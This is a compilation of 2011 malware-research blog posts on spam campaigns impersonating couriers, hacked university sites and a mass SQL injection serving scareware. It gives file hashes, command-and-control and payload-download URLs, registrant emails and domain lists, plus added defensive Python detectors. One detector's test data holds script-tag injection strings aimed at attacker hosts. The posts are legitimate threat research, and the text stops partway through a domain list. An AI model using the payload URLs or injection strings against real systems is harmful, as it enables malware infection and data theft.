More Spamvertised DHL Notifications Spread Malware (2011-03-11 15:31)

[1]

Yesterday's campaign is still ongoing, with new MD5's in the wild. Here are the details.

Sample subjects: DHL notification #random number

Sample message: Dear customer! The parcel was send your home address. And it will arrice within 7 bussness day. More information and the tracking number are attached in document below. Thank you. 2011 DHL International GmbH. All rights reserverd.

Sample filenames: DHL_tracking.zip; doc.zip

doc.exe - [2]Trojan-Spy.SpyEy!IK - Result: 18/43 (41.9 %)

MD5: 83db662187dd7cd58fc4a368ea27775d

SHA1: 4edb2d95c0570a36f6cb992e55111cdd7c3eda69

SHA256: 99f1e003bbf1025b0bbe257ece65d1704852fd1ba48e6cc79bd39cde6e6d14c3

DHL_tracking.exe - [3]Win-Trojan/Spyeyes.45568 - Result: 29/43 (67.4 %)

MD5: 81fc09b014617bce59f678374b486512

SHA1: 3d92a768f58b2900b98c9f97ce2753d27a4749ae

SHA256: 24b23bf7ebd03bf5feb0c637ea1e64661e27c78c66684dd49f074af2b2505bb7

Upon execution phones back to:

adobe.com/geo/productid.php
elsoplongt.com/rk',jopbh/qwq - Email: redaccion@elsoplongt.com
accuratefiles.com/rk',jopbh/qwq
lulango.com/rk',jopbh/qwq - Email: lulango@gmail.com
erherg34gsafwe.com/xgate.php - AS49469, Email: admin@erherg34gsafwe.com
- erherg34gsafwe.com/ftp/base.bin
- erherg34gsafwe.com/ftp/ftpplug2.dll
- erherg34gsafwe.com/ftp/base.bin

Domains responding to:

192.150.16.117
72.41.115.170
74.117.180.216
87.106.193.21
94.63.244.56

Additional malicious activity within AS49469 (SA-NOVA-TELECOM-GRUP-SRL Sa Nova Telecom Grup SRL), courtesy of the [4]ZeusTracker and the [5]SpyEye Tracker:
bigupdate.ru - Email: admin@hotupdaters.ru
bigupdatings.ru - Email: admin@bigupdatings.ru
bigupdater.ru - Email: admin@bigupdater.ru
bigupdates.ru - Email: admin@istuplenie.ru
bigupdating.ru - Email: admin@bigupdating.ru
bigupdaters.ru - Email: admin@bigupdaters.ru
94.63.244.30
metamphcrystal.com - Email: admin@metamphcrystal.com

Related malware-serving domains within AS49469, SA-NOVA-TELECOM-GRUP-SRL Sa Nova Telecom Grup SRL:

xppclapgirl.com - 89.114.9.33
natnatraoi.com - 12.211.117.127 - Email: barbarasorber@yahoo.com
d34ghqarfrgad.com - 94.63.244.56 - Email: admin@d34ghqarfrgad.com
g3u4g.net - 89.114.9.33 - Email: G3U4G.NET@domainservice.com
suhi4hr.net - 89.114.9.60 - Email: SUHI4HR.NET@domainservice.com
mialedot.ru - 94.63.244.44 - Email: abuse@mialedot.ru
blackmemoso.com - Email: grasp@yourisp.ru

This post has been reproduced from [6]Dancho Danchev's blog.

1. https://lh6.googleusercontent.com/-

2. http://www.virustotal.com/file-scan/report.html?
de6e6d14c3-1299847160MD5%20%20%20

3. http://www.virustotal.com/file-scan/report.html?
49f074a

4. https://zeustracker.abuse.ch/monitor.php?as=49469

5. https://spyeyetracker.abuse.ch/monitor.php?as=49469&filter=online

6. http://ddanchev.blogspot.com/
Spamvertised FedEx Notifications Spread Malware (2011-03-16 18:14)

[1]

A currently ongoing spamvertised campaign is brand-jacking FedEx for malware serving purposes.

Sample attachments: FedEx letter.zip; FedEx letter.exe

Sample subject: FedEx notification #random number

Sample message: Dear customer. The parcel was sent your home address. And it will arrive within 7 business day. More information and the tracking number are attached in document below. Thank you. © FedEx 1995-2011

Detection rate: FedEx letter.exe - [2]Trojan.FakeAV - Result: 24/43 (55.8 %)

MD5: 90bef5dff5809682249813fd63b67da4

SHA1: 2418c01a30a19a2d76b693474a852092e3de4a32

SHA256: a38848786528d235b51fed3adf20050f5c1906d066e0282311b8bce37d8163a0

Phones back to AS30890 (EVOLVA Evolva Telecom s.r.l.):

94.63.244.56/lol2.exe
94.63.244.56/pod.exe

with 94.63.244.56/allftp.txt; 94.63.244.56/ftp/db_grab.txt hosting the sniffed FTP credentials.

Responding to 94.63.244.56 are d34ghqarfrgad.com and erherg34gsafwe.com, phone back URLs which we've seen from last week's spamvertised DHL Notifications campaigns, with the use of the IP best described as a desperate attempt to maintain a C&C infrastructure:

• [3]Spamvertised DHL Notification Malware Campaign
• [4]More Spamvertised DHL Notifications Spread Malware

This post has been reproduced from [5]Dancho Danchev's blog.

1. https://lh4.googleusercontent.com/-Yeka44oRoOA/TYDQ4-a8aOI/AAAAAAAAE2o/eti6lsnhs4Q/s1600/fedex-logo.jpeg

2. http://www.virustotal.com/file-scan/report.html?id=a38848786528d235b51fed3adf20050f5c1906d066e0282311b8bce37d8163a0-1300286639

3. http://ddanchev.blogspot.com/2011/03/spamvertised-dhl-notificication-malware.html

4. http://ddanchev.blogspot.com/2011/03/more-spamvertised-dhl-notifications.html

5. http://ddanchev.blogspot.com/
Compromised Universities Leads to Fraudulent Pharmaceutical Ads (2011-03-16 19:30)

[1]

Continuing the "[2]Compromised University Leads to Fraudulent Pharmaceutical Ads" and "[3]Compromised University Leads to Fraudulent Google Brand-jacked Pharmaceutical Ads" series, in this post we'll discuss two more compromised web servers of educational institutions leading to pharmaceutical ads. Affected universities are:

Rutgers Energy Institute:

ruei.rutgers.edu/documents/chin.php?adv=cialis20-mg
ruei.rutgers.edu/documents/chin.php?adv=viagra-ratings
ruei.rutgers.edu/documents/chin.php?adv=viagra-999
ruei.rutgers.edu/documents/chin.php?adv=viagra-expired
ruei.rutgers.edu/documents/chin.php?adv=viagra-kako-se

Uploaded redirectors:

ruei.rutgers.edu/documents/chin.php
ruei.rutgers.edu/documents/roar.php
ruei.rutgers.edu/documents/ost.php

Computer Music Center at Columbia University:

music.columbia.edu/cmc/pills/index.php?adv=how-to-try-viagra
music.columbia.edu/cmc/pills/index.php?adv=damaskviagra
music.columbia.edu/cmc/pills/index.php?adv=brandlevitra
music.columbia.edu/cmc/pills/index.php?adv=vegetalviagra
music.columbia.edu/cmc/pills/index.php?adv=vviagra

[Screenshot: injected pharmacy storefront on the compromised host, with fake customer testimonials and product listings ("Female Viagra")]

[4]

The sampled URLs redirect to the following fraudulent pharmaceutical sites:

pillsedonline.com - 93.170.104.53 - Email: stavros1929@hotmail.com; stavroscomodromos@yahoo.com
buyperfecthealth.com - 93.170.104.53 - Email: stavros1929@hotmail.com
safedrugstock.com - 93.170.104.53 - Email: stavros1929@hotmail.com
securedrugstock.com - 93.170.104.53 - Email: stavros1929@hotmail.com
europharmas.com - 93.170.104.53 - Email: glockner546@hotmail.com
requestpills.com - 93.170.104.53 - Email: stavros1929@hotmail.com; stavroscomodromos@yahoo.com
online-doc.us - 93.170.104.53 - Email: cool_gamer90@mail.ru
pills4sex.eu - 93.170.104.53
securetablets.com - 93.170.104.53 - Email: stavros1929@hotmail.com
alledtablets.com - 93.170.104.53 - Email: stavros1929@hotmail.com; stavroscomodromos@yahoo.com
canadian-refills.com - 178.239.60.214 - Email: privacy-829911@domainprivacygroup.com

Cybercriminals continue purchasing web shells and stolen FTP credentials for high-PageRank web sites such as those of educational institutions. Monitoring of their operations will continue.
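The uploaded redirectors above (chin.php, roar.php and ost.php sitting in a documents directory) are exactly the kind of change a file-integrity baseline catches, whether the files arrived through a web shell or stolen FTP credentials. As an added example that is not code from the post or from either university, the Python below hashes a directory tree into a manifest, diffs two manifests, and flags new or modified server-side scripts. The demo builds a throwaway documents/ tree in a temporary directory and drops a constructed stand-in chin.php into it; the file names are borrowed from the post, the contents are placeholders.

```python
import hashlib
import os
import tempfile

# Extensions that should never appear in a static-documents directory.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".cgi", ".pl", ".py")


def build_manifest(root):
    """Map relative path (POSIX separators) -> SHA-256 of every file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                manifest[rel] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def diff_manifests(baseline, current):
    """Paths added, removed, or changed between two manifests."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def suspicious(diff):
    """New or changed server-side scripts: the redirector pattern the post
    describes, where a PHP file shows up among static documents."""
    return [p for p in diff["added"] + diff["modified"] if p.lower().endswith(SCRIPT_EXT)]


def demo():
    """Constructed scenario: baseline a documents/ tree, then simulate the
    intrusion by dropping a PHP redirector stand-in into it."""
    with tempfile.TemporaryDirectory() as root:
        docs = os.path.join(root, "documents")
        os.makedirs(docs)
        with open(os.path.join(docs, "report.pdf"), "wb") as fh:
            fh.write(b"%PDF-1.4 constructed sample\n")
        baseline = build_manifest(root)
        # The file name is from the post; the body is an inert placeholder.
        with open(os.path.join(docs, "chin.php"), "wb") as fh:
            fh.write(b"<?php /* constructed stand-in, no redirect logic */ ?>\n")
        current = build_manifest(root)
        return suspicious(diff_manifests(baseline, current))


if __name__ == "__main__":
    print("suspicious:", demo())
```

In practice the baseline manifest is stored off-host (an attacker with the site's FTP credentials can edit a manifest kept in the web root) and the diff runs on a schedule; a new .php under a directory that is only meant to hold documents is worth an alert on its own, before any content analysis.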
This post has been reproduced from [5]Dancho Danchev's blog.
Spamvertised United Parcel Service notifications serve malware (2011-03-23 15:54)

[1]

A currently ongoing spam campaign is impersonating UPS for malware-serving purposes.

Sample subject: United Parcel Service notification

Sample attachments: UPSnotify.rar; UPSnotify.exe; UnitedParcelServicedocument.exe

Sample message: Dear customer. The parcel was sent your home address. And it will ar­rive within 7 business day. More information and the tracking number are attached in document below. Thank you. © 1994-2011 United Parcel Service of America, Inc.

Detection rates:

UnitedParcelServicedocument.exe - [2]Mal/Bredo-K - Result: 7/41 (17.1 %)

MD5: b60e95b42106989bc39e175efcc031db

SHA1: 0fb63dff83db643c9ee42efe617bdd539a5ffb8f

SHA256: 65f14438c3154a74767131a427fbdc50c28a6cbcdcf47f3d418b92c4c168696a

UPSnotify.exe - [3]Mal/Bredo-K - Result: 17/40 (42.5 %)

MD5: cc040e69121bc19f23ef4a32dbb8a80e

SHA1: da65b7b277540b88918076949a28e8307ad7e41a

SHA256: ef5f76e1b20c2083469fbe7e4de4ec9c06689ee105274b1a79c9cadbd23d54ae

Upon execution downloads additional binaries from:

193.105.121.33/lol2.exe
193.105.121.33/pod.exe
193.105.121.33/spm.exe

Responding to 193.105.121.33 are undeardarling.com - Email: admin@undearhappydear.com and undearhappydear.com - Email: admin@undearhappydear.com

Detection rates:

lol2.exe - [4]Trojan.FakeAV!gen39 - Result: 14/43 (32.6 %)

MD5: 747431a2a4a29f1bfc136e674af99ad0

SHA1: 8349fc3f5f299d0ca6473e748276ec2b50019330

SHA256: 6009e7f5cbc55e6acb060d9fb33a39a978168a32a0a8c6a24f201106056cc0db

pod.exe - [5]Backdoor.Win32.CbotSIK - Result: 33/42 (78.6 %)

MD5: f403afdbe4c4c859c8ab018a7ded694c

SHA1: 1915a46cbb43fcaf8da90af95856d7524b24f129

SHA256: eddfff99df316669191be0b61a5ae06ee811bbd27110111e69cbd212881fa494

Upon execution phones back to:

healthylifenow.com - 208.109.223.193 - Email: HEALTHYLIFENOW.COM@domainsbyproxy.com
bigbeerclubonline.com - Email: contact@privacyprotect.org
zonetf.com - 96.9.169.85 - Email: janeob@126.com

spm.exe - [6]W32.Pilleuz - 10/42 (23.8 %)

MD5: de55498b9f9195f1733df62c7026cf5f

SHA1: 5520c1220cdd03a64f9b782c2393697ebab154b9

SHA256: dc2a797e5be968f9d36d4510988fa242c042a3e315fb50a3f9325cae6a1d779d

Upon execution phones back to:

ponel.biz - 46.4.62.17 - Email: web_raskrutka@pochta.ru
itisformebaby.biz - 46.4.10.7; 88.198.46.151; 178.63.63.208 - Email: web_raskrutka@pochta.ru
gmail.com
yahoo.com
hotmail.com

As speculated, cybercriminals have started feeding legitimate sites into their C&C communication patterns in an attempt to undermine community efforts aimed at tracking their malicious activities.
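The padding just described (gmail.com, yahoo.com and hotmail.com in the phone-back list, like the adobe.com geolocation check in the DHL samples) is a problem for anyone who turns such lists straight into block rules. As an added example that is not from the post: a Python filter that separates well-known legitimate hosts from the rest of a phone-back list before rules are generated. The allowlist is a constructed stand-in for a curated list, the registrable-domain logic is a deliberate two-label approximation (no public-suffix list offline), and the sample lines follow the post's layout.

```python
import re
from urllib.parse import urlsplit

# Constructed stand-in for a curated allowlist of high-traffic legitimate
# domains; a real deployment loads a maintained list instead.
ALLOWLIST = {"gmail.com", "yahoo.com", "hotmail.com", "adobe.com"}

# Constructed sample in the post's layout: "host - IPs - Email: ..." lines,
# bare hosts, and a host carrying a path.
SAMPLE = """\
ponel.biz - 46.4.62.17 - Email: web_raskrutka@pochta.ru
itisformebaby.biz - 46.4.10.7; 88.198.46.151; 178.63.63.208 - Email: web_raskrutka@pochta.ru
gmail.com
yahoo.com
hotmail.com
adobe.com/geo/productid.php
"""

HOST_RE = re.compile(r"^[a-z0-9.-]+$")


def host_of(line):
    """Hostname of a list line: first ' - ' field, path stripped, lower-cased;
    '' for anything that is not a plausible hostname (headers, blank lines)."""
    first = line.split(" - ", 1)[0].strip()
    if not first:
        return ""
    host = urlsplit("//" + first).hostname or ""
    return host if HOST_RE.match(host) else ""


def registrable(host):
    """Last two labels of a hostname. Assumption: no public-suffix list is
    available offline, so .co.uk-style names would need a real PSL lookup."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def split_iocs(text, allowlist=ALLOWLIST):
    """Return (blockable, allowlisted). Hosts whose registrable domain is on
    the allowlist are reported separately instead of becoming block rules."""
    blockable, allowlisted = [], []
    for line in text.splitlines():
        host = host_of(line)
        if not host:
            continue
        (allowlisted if registrable(host) in allowlist else blockable).append(host)
    return blockable, allowlisted


def block_rules(text, allowlist=ALLOWLIST):
    """Hosts-file style sink entries for the blockable hosts only."""
    blockable, _ = split_iocs(text, allowlist)
    return [f"0.0.0.0 {h}" for h in blockable]


if __name__ == "__main__":
    blockable, allowlisted = split_iocs(SAMPLE)
    print("block:", blockable)
    print("review, do not block:", allowlisted)
```

The allowlisted hosts are still worth logging: a connection to adobe.com from a sample is telemetry, and a sudden appearance of webmail domains in a C&C list is itself the signal the post describes.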

Related posts:

[7]Spamvertised FedEx Notifications Spread Malware
[8]Spamvertised DHL Notification Malware Campaign
[9]More Spamvertised DHL Notifications Spread Malware

This post has been reproduced from [10]Dancho Danchev's blog.
Spamvertised Post Office Express Mail (USPS) Emails Serving Malware (2011-03-25 18:20)

[1]

A currently spamvertised malware campaign is impersonating the USPS for malware-serving purposes.

Sample subject: Post Express Information. Your package is available for pick up. NR[random number]

Sample attachment: Post_Express_Label_ID[random number].zip; Post_Express_Label.exe

Sample message: Dear client, Email notice number.[random number]. Your package has been returned to the Post Express office. The reason of the return is "Error in the delivery address" Important message! Attached to the letter mailing label contains the details of the package delivery. You have to print mailing label, and come in the Post Express office in order to receive the packages! Thank you for using our services. Post Express Support.

Detection rate:

Post_Express_Label.exe - [2]Medium Risk Malware Dropper - Result: 1/41 (2.4 %)

MD5: 3c05dd68ee0bfb9b290b9c034f836833

SHA1: 8a1a00da04c96c8e67b9921652de60463118ea9f

SHA256: 57d58165c79158a42c3e45670aa4176aaae393f371188f91d0ac46022bd3e7c0

[3]
[Screenshot: fake "Post Express Service - Details of delivery parcels" table from the lure (weight, length and amount columns filled with random figures)]

Upon execution phones back to:

mialepromo.ru/7Pe80Rolxs/document.doc
mialepromo.ru/7Pe80Rolxs/load.php?file=0
mialepromo.ru/7Pe80Rolxs/load.php?file=1
mialepromo.ru/7Pe80Rolxs/load.php?file=2
mialepromo.ru/7Pe80Rolxs/load.php?file=3
mialepromo.ru/7Pe80Rolxs/load.php?file=4
mialepromo.ru/7Pe80Rolxs/load.php?file=5
mialepromo.ru/7Pe80Rolxs/load.php?file=6
mialepromo.ru/7Pe80Rolxs/load.php?file=7
mialepromo.ru/7Pe80Rolxs/load.php?file=8
mialepromo.ru/7Pe80Rolxs/load.php?file=9
mialepromo.ru/7Pe80Rolxs/load.php?file=uploader
mialepromo.ru/7Pe80Rolxs/load.php?file=grabbers

mialepromo.ru - 89.208.149.204 (AS12695); 109.94.220.51 (AS47860); 109.94.220.50 (AS47860); 91.199.75.77 (AS44301); 178.17.164.131 (AS43289); 193.22.81.104 (AS28920) - Email: salam@ica.org

Monitoring of the campaign is ongoing.
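The DHL, FedEx, UPS and Post Express lures in this series share one shape: a courier "notification" subject and an archive attachment that unpacks to an executable (document.zip => DHL_notification.exe, DHL_tracking.zip, FedEx letter.zip, Post_Express_Label_ID[...].zip). As an added example that is not code from any of these posts, the Python below builds a constructed message of that shape with the standard email and zipfile modules and triages it on those two signals. The sender and recipient addresses are placeholders, the archive member is a harmless stub rather than a sample, and the brand and keyword lists are assumptions drawn from the subjects quoted above.

```python
import email
import io
import re
import zipfile
from email.message import EmailMessage
from email.policy import default

# Brands impersonated by the lures in this series (word-bounded, case-insensitive).
BRAND_RE = re.compile(r"\b(dhl|fedex|ups|united parcel service|post express|usps)\b", re.I)
# Subject phrases seen in the quoted lures.
NOTICE_RE = re.compile(r"\b(notification|your package|tracking)\b", re.I)
EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")


def build_sample_message(subject, archive_name, inner_name):
    """Construct a lure-shaped message: a zip attachment wrapping one file.
    The inner file is an inert stub (an 'MZ' prefix and zeros), not malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(inner_name, b"MZ" + b"\0" * 64)
    msg = EmailMessage()
    msg["Subject"] = subject
    msg["From"] = "noreply@example.invalid"    # placeholder sender
    msg["To"] = "recipient@example.invalid"    # placeholder recipient
    msg.set_content("Dear customer. The parcel was sent your home address.")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="zip", filename=archive_name)
    return msg.as_bytes()


def archived_executables(data):
    """Names of executable members inside a zip payload; [] if not a zip."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return [n for n in zf.namelist() if n.lower().endswith(EXEC_EXT)]
    except zipfile.BadZipFile:
        return []


def triage(raw):
    """Return (verdict, findings) for a raw RFC 5322 message.
    Quarantine whenever an executable is attached, bare or inside an archive;
    the courier-subject match is recorded as supporting context."""
    msg = email.message_from_bytes(raw, policy=default)
    subject = msg["Subject"] or ""
    findings = []
    brand = BRAND_RE.search(subject)
    if brand and NOTICE_RE.search(subject):
        findings.append(f"courier-notification subject impersonating {brand.group(1)}")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if name.lower().endswith(EXEC_EXT):
            findings.append(f"bare executable attachment {name}")
        for inner in archived_executables(part.get_payload(decode=True) or b""):
            findings.append(f"archive {name} unpacks to executable {inner}")
    verdict = "quarantine" if any("executable" in f for f in findings) else "deliver"
    return verdict, findings


if __name__ == "__main__":
    raw = build_sample_message("DHL notification #4471", "document.zip", "DHL_notification.exe")
    print(triage(raw))
```

The executable-in-archive rule carries the decision on its own; the subject match only explains which campaign a quarantined message belongs to, so a lure with a new courier name still gets stopped. RAR attachments like the UPSnotify.rar above need an external extractor, which is why the check is written around what the gateway can open.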

Related posts:

[4]Spamvertised United Parcel Service notifications serve malware
[5]Spamvertised FedEx Notifications Spread Malware
[6]Spamvertised DHL Notification Malware Campaign
[7]More Spamvertised DHL Notifications Spread Malware

This post has been reproduced from [8]Dancho Danchev's blog.
[Screenshot: rogue "Microsoft Security Essentials"-style alert ("Potential threat details") reporting C:\windows\system32\cmd.exe as "Unknown Win32/Trojan", alert level Severe, recommendation Remove, with "Clean computer" / "Apply actions" buttons]
Dissecting the Massive SQL injection Attack Serving Scareware (2011-03-31 19:54)

A currently ongoing massive SQL injection attack has affected hundreds of thousands of web pages across the Web, to ultimately monetize the campaign through a scareware affiliate program. Such massive SQL injection attempts are usually conducted using [1]mass vulnerability scanning tools, with the help of [2]search engines which have already [3]crawled the vulnerable sites.

What's particularly interesting about this campaign is the fact that the used domains are all responding to the same IPs, including the portfolios of scareware domains, which the cybercriminals naturally rotate on a periodic basis. Let's dissect the campaign, expose the domain portfolios and the entire campaign structure.
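As an added example that is not from the post: the post lists the injected URLs (host/ur.php); that they were stored in database text columns as <script src=...> tags is assumed here, so the Python below scans the text columns of a table for script tags referencing hosts outside a trusted set and grades each hit against the campaign domains listed in the post. The table, its rows and the trusted host are constructed in an in-memory SQLite database.

```python
import re
import sqlite3

# <script ... src="http://host/..."> or src=//host/...; captures the host.
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*['\"]?\s*(?:https?:)?//([^/'\"\s>]+)", re.I)

# Campaign hosts named in the post.
KNOWN_BAD = {"lizamoon.com", "milapop.com", "agasi-story.info", "eva-marine.info"}

# Table and column names are quoted identifiers, not bind parameters, so
# they are validated before being placed in the query text.
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def external_script_hosts(text):
    """Hosts referenced by <script src=...> tags in one text value."""
    return [h.lower() for h in SCRIPT_SRC_RE.findall(text or "")]


def scan_table(conn, table, columns, trusted_hosts=()):
    """Return [(rowid, column, host, grade)] for every script tag in the given
    text columns that points outside trusted_hosts; grade is 'known' when the
    host is one of the listed campaign domains, otherwise 'unknown'."""
    for ident in (table, *columns):
        if not IDENT_RE.match(ident):
            raise ValueError(f"bad identifier: {ident!r}")
    select = ", ".join(f'"{c}"' for c in columns)
    hits = []
    for rowid, *values in conn.execute(f'SELECT rowid, {select} FROM "{table}"'):
        for column, value in zip(columns, values):
            for host in external_script_hosts(value):
                if host in trusted_hosts:
                    continue
                hits.append((rowid, column, host, "known" if host in KNOWN_BAD else "unknown"))
    return hits


def demo():
    """Constructed in-memory table: one clean row, one legitimately embedded
    script, and two injected rows (one listed campaign host, one unlisted)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, description TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [
        ("Chair", "Solid oak."),
        ("Table", "Seats six.</title><script src=http://lizamoon.com/ur.php></script>"),
        ("Lamp", '<script src="https://cdn.example.org/widget.js"></script>'),
        ("Desk", "<script src='//evil.example/ur.php'></script>"),
    ])
    return scan_table(conn, "products", ["name", "description"],
                      trusted_hosts={"cdn.example.org"})


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Running this over every text column of the affected schema is the cleanup step; the 'unknown' grade matters as much as 'known', because the same campaign rotated domains faster than any list could follow. Restoring the rows is not enough on its own: the injection point (typically an unparameterised query building SQL from request input) has to be fixed first, or the rows are rewritten within hours.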

UPDATED: Related SQL injected URLs [4]courtesy of WebSense:

online-stats201.info/ur.php - Email: tik0066@gmail.com
stats-master111.info/ur.php - Email: tik0066@gmail.com
agasi-story.info/ur.php - 91.217.162.45 - Email: tik0066@gmail.com
general-st.info/ur.php - Email: tik0066@gmail.com
extra-service.info/ur.php - Email: tik0066@gmail.com
sol-stats.info/ur.php - Email: tik0066@gmail.com
google-stats49.info/ur.php - Email: tik0066@gmail.com
google-stats45.info/ur.php - Email: tik0066@gmail.com
[Screenshot: scareware "System scan progress" window shown over a Windows Explorer view, listing fake detections ("Critical" risk level, "Waiting removal" state) under "Your Computer is ..." and advising "You need to remove this threat as soon as possible".]

google-stats50.info/ur.php - Email: tik0066@gmail.com 
google-server43.info/ur.php - Email: tik0066@gmail.com 
stats-master88.info/ur.php - Email: tik0066@gmail.com 
eva-marine.info/ur.php - 109.236.81.28 - Email: tik0066@gmail.com 
stats-master99.info/ur.php - Email: tik0066@gmail.com 
tzv-stats.info/ur.php - Email: tik0066@gmail.com 
milapop.com/ur.php - Email: jamesnorthone@hotmailbox.com 

SQL injected URLs: 

lizamoon.com/ur.php (67,500 results) - 91.220.35.151 (AS3721); 91.213.29.182 (AS51786); 95.64.9.18 (AS50244) - Email: jamesnorthone@hotmailbox.com 
alexblane.com/ur.php (3,920 results) - Email: jamesnorthone@hotmailbox.com 
alisa-carter.com/ur.php (220,000 results) - Email: jamesnorthone@hotmailbox.com 
t6ryt56.info/ur.php (18 results) - Email: support@ruler-domains.com 
tadygus.com/ur.php (100 results) - Email: jamesnorthone@hotmailbox.com 
world-of-books.com/ur.php (334,000 results) - Email: tik0066@gmail.com 

Upon successful redirection, the campaign attempts to load 
the scareware domain defender-nibea.in/scanlb/237 - 
46.252.130.200 - Email: jimwei2969@gmail.com 

Detection rate: 

freesystemscan.exe - [5]Trojan/Win32.FakeAV - Result: 9/41 (22.0%) 
MD5: 815d77f8fca509dde1abeafabed30b65 
SHA1: 1b3c35afb76c53cd9507fffee46fb58c29e72bc1 
SHA256: cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03f75dcd7e95c 

Responding to 46.252.130.200 (AS25190; KIS-AS UAB 
"Kauno Interneto Sistemos") are also: 

antivirus-1091.co.cc 
antivirus-1574.co.cc 
antivirus-2051.co.cc 
antivirus-2525.co.cc 
antivirus-2932.co.cc 
antivirus-3654.co.cc 
antivirus-3833.co.cc 
antivirus-4063.co.cc 
antivirus-418.co.cc 
antivirus-4303.co.cc 
antivirus-4749.co.cc 
antivirus-495.co.cc 
antivirus-5216.co.cc 
antivirus-5676.co.cc 
antivirus-5802.co.cc 
antivirus-6437.co.cc 
antivirus-6703.co.cc 
antivirus-7081.co.cc 
antivirus-713.co.cc 
antivirus-728.co.cc 
antivirus-7357.co.cc 
antivirus-8072.co.cc 
antivirus-9009.co.cc 
antivirus-9638.co.cc 
antivirus-9667.co.cc 
defender-aabv.in - Email: leonflanagan7681@gmail.com 
defender-aqeu.co.cc 
defender-asng.co.cc 
defender-atio.in - Email: terriduverger3239@gmail.com 
defender-atxo.in - Email: celinelebba9266@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 
defender-bwuy.co.cc 
defender-cron.in - Email: lisasuresh9147@gmail.com 
defender-ddbr.in - Email: selenajohansson9195@gmail.com 
defender-dteo.in - Email: giovannaraggio5417@gmail.com 
defender-eahy.co.cc 
defender-eklq.in - Email: sebastiensheppard8680@gmail.com 
defender-endl.in - Email: adamgaylard1113@gmail.com 
defender-ewum.co.cc 
defender-eyde.co.cc 
defender-fmof.in - Email: kamillamartin1237@gmail.com 
defender-fola.co.cc 
defender-gnva.in - Email: ananddaher7294@gmail.com 
defender-grit.in - Email: anthonygaylard9887@gmail.com 
antivirl.mooo.com 
defender-hipw.in - Email: angiejohansen9730@gmail.com 
defender-hjlk.in - Email: jennwrayford2124@gmail.com 
defender-hmfu.in - Email: lynnbone8026@gmail.com 
defender-hsug.in - Email: moniquetkarnopp3596@gmail.com 
defender-htlu.in - Email: jerihamann4163@gmail.com 
defender-iibk.co.cc 
defender-iies.co.cc 
defender-iksl.in - Email: amarasanders9974@gmail.com 
defender-isde.co.cc 
defender-iyrc.co.cc 
defender-jgnl.in - Email: caseyalzen3316@gmail.com 
defender-jihv.co.cc 
defender-keod.in - Email: khashayarbirss4814@gmail.com 
defender-kuts.in - Email: rogerfrancis3322@gmail.com 
defender-kwwh.in - Email: tobyboisseau6505@gmail.com 
defender-kzwu.co.cc 
defender-labm.in - Email: gregorybradford1520@gmail.com 
defender-lcoh.in - Email: timothythomas6924@gmail.com 
defender-nhei.co.cc 
defender-nrpr.in - Email: burtonalba8156@gmail.com 
defender-ojbr.in - Email: fucknielsen8675@gmail.com 
defender-osbi.in - Email: fidelslattum2159@gmail.com 
defender-pakc.in - Email: sabrinawheelock7642@gmail.com 
defender-ppdw.in - Email: divinakempton5670@gmail.com 
defender-qfdx.in - Email: hokyeongyancey6369@gmail.com 
defender-qotg.in - Email: franchescaiii9704@gmail.com 
defender-qpwo.in - Email: carlaadams@gmail.com 
defender-qsko.co.cc 
defender-qumf.in - Email: carlaadams@gmail.com 
defender-rlag.in - Email: carmichaelmail@gmail.com 
defender-rrin.in - Email: kevincharoenset5321@gmail.com 
defender-thga.in - Email: youngantonio6055@gmail.com 
defender-ueuv.co.cc 
defender-uqko.in - Email: christinakaaikati5574@gmail.com 
defender-vflq.in - Email: terriacuna2081@gmail.com 
defender-vlmj.in - Email: lauriefreeman9930@gmail.com 
defender-vqqn.in - Email: chrisjames4421@gmail.com 
defender-vxgh.in - Email: griseldavelez5369@gmail.com 
defender-wkiw.in - Email: otisvaladez7778@gmail.com 
defender-wqga.in - Email: christodoulosglidden8856@gmail.com 
defender-wrhw.in - Email: bradsuresh1406@gmail.com 
defender-wtln.co.cc 
defender-xcre.in - Email: pavelmayer4891@gmail.com 
defender-xnnx.in - Email: pavelmayer4891@gmail.com 
defender-ykym.co.cc 
movie-iirg.in - Email: misslynn8546@gmail.com 
movie-pblv.in - Email: judgewright4021@gmail.com 
movies-live-tube-jeyq.co.cc 
movie-tkhk.in - Email: terrymeally1288@gmail.com 
movie-tube-beym.co.cc 
movie-tube-juie.co.cc 
movie-ueep.in - Email: celinekevin6179@gmail.com 
movieway2011.com - Email: contact@privacyprotect.org 
movie-xbtb.in - Email: sanfordross9242@gmail.com 
movie-xxni.in - Email: ianbalitsaris3201@gmail.com 
softway2011.com - Email: contact@privacyprotect.org 
system-scanner-boep.co.cc 
system-scanner-eill.co.cc 
system-scanner-eopa.co.cc 
system-scanner-ewqq.co.cc 
system-scanner-iaap.co.cc 
system-scanner-ieyx.co.cc 
system-scanner-lcyo.co.cc 
system-scanner-ouny.co.cc 
system-scanner-oypx.co.cc 
system-scanner-qeap.co.cc 
system-scanner-racv.co.cc 
system-scanner-ryes.co.cc 
system-scanner-tzii.co.cc 
system-scanner-uemo.co.cc 
system-scanner-uotu.co.cc 
system-scanner-uyxt.co.cc 
system-scanner-vpoo.co.cc 
system-scanner-xtoi.co.cc 
system-scanner-yoyx.co.cc 
system-scanner-ytut.co.cc 

Rotated scareware domains involved in the campaign, 
